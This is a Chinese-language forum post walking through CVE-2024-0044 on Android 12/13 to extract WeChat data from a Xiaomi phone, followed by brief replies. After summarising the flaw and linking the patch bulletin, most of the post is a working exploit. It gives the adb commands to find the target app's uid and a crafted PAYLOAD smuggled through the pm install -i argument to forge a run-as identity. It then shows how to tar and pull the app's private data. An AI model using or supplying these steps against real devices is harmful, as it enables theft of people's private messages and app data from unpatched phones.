首页
社区
课程
招聘
利用CVE_2024_0044获取手机(Android12/13)上的应用数据
2024-7-3 09:39 9625

利用CVE_2024_0044获取手机(Android12/13)上的应用数据

2024-7-3 09:39
9625

漏洞描述

CVE-2024-0044是一项高危漏洞,影响Android 12和13版本,该漏洞位于PackageInstallerService.java文件的createSessionInternal函数中。此漏洞允许攻击者执行"run-as any app"攻击,从而在不需要用户交互的情况下实现本地特权升级。问题出现在createSessionInternal函数中的输入验证不当。攻击者可以通过操纵会话创建过程来利用此漏洞,可能会未经授权地访问敏感数据并在受影响设备上执行未经授权的操作。

该漏洞由Meta Security发现:

https://rtx.meta.security/exploitation/2024/03/04/Android-run-as-forgery.html

Tiny hack总结并分享了概念证明:

https://tinyhack.com/2024/06/07/extracting-whatsapp-database-or-any-app-data-from-android-12-13-using-cve-2024-0044/?s=03

有关安全补丁的详细信息,请参阅Android 安全公告:

https://source.android.com/docs/security/bulletin/2024-03-01

poc实践

参考https://github.com/pl4int3xt/cve_2024_0044

目标:提取手机上微信数据。

手机:小米10 HyberOS1.0.5.0TJBCNXM Android13 补丁时间:2024-03-01

1.查看微信uid

利用adb shell命令查看微信的uid

1
$ pm list package -U |grep com.tencent.mm

执行后可以得到微信uid 10314

2.推送任意一个app到/data/local/tmp目录下,这里采用参考文章一样的F-Droid.apk

1
adb push F-Droid.apk /data/local/tmp/F-Droid.apk

3.执行poc,这里将uid替换为微信的uid,victim这个名称也是可以改的;这里是直接复制下面的代码到adb shell命令框中的

1
2
3
PAYLOAD="@null
victim 10314 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk


4.切换为微信用户

1
$ run-as victim


可以看到此时shell已经是微信uid了。

5.获取微信数据

1
2
3
4
5
umi:/ $ mkdir /data/local/tmp/mm/                                                                           
umi:/ $ touch /data/local/tmp/mm/mm.tar
umi:/ $ chmod -R 0777 /data/local/tmp/mm/
umi:/ $ run-as victim
umi:/data/user/0 $ tar -cf /data/local/tmp/mm/mm.tar com.tencent.mm

拉取数据

1
adb pull /data/local/tmp/mm/mm.tar

[培训]科锐软件逆向50期预科班报名即将截止,速来!!! 50期正式班报名火爆招生中!!!

收藏
免费 8
打赏
分享
最新回复 (4)
雪    币: 4051
活跃值: (2992)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
文西哥 2024-7-3 10:26
2
1
马上买最新版的安卓 14手机
雪    币: 5983
活跃值: (4347)
能力值: ( LV5,RANK:70 )
在线值:
发帖
回帖
粉丝
简单的简单 2024-7-3 18:17
3
1
马上买最新版的安卓 14手机
雪    币: 89
活跃值: (199)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
xxhaishixx 2024-7-9 02:42
4
0
马上买最新版的安卓 14手机
雪    币: 242
活跃值: (637)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
tcc0lin 2024-7-11 11:27
5
0
学到了
游客
登录 | 注册 方可回帖
返回